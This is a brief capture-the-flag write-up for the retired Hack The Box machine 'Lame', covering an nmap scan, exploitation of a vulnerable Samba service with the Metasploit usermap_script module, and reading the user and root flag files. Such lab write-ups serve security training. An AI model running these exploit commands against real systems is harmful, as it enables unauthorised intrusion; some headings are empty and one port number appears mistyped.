LAME 10.10.10.3 Write Up

Contents

Retired Easy Machine by ch4p Lame profile

Tools

  1. nmap
  2. Metasploit

Enumeration

  1. At first we use nmap (Network Mapping tool) to scan the box ip. When we run it we got list of some open ports and services running on those ports. On the Lame box we can see, open ports and services are, port 21 for vsftpd 2.3.4, port 22 for SSH, port 129 and 445 for Samba smbd 3.X-4.X nmap -sV 10.10.10.3
  2. When we google about those running services to gather information about those services, we get Samba smbd 3.X is vulnerable and fortunately an metasploit module is there to exploit the service.

Exploitation

  1. Using metasploit we can use the exploit to shell the box. 
     use exploit/multi/samba/usermap_script
 msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
 msf exploit(multi/samba/usermap_script) > exploit

Enumeration 1

Enumeration 2

Now open home folder using terminal and find the user.txt.

  cd home
  ls
  cd makis
  ls
  cat user.txt
  1. Now goto root folder and find the root.txt.
  cd root
  ls
  cat root.txt

Flags</li>

Walkthrough

https://www.youtube.com/watch?v=sq0qVn3iLm0

Author: Zishan Ahamed Thandar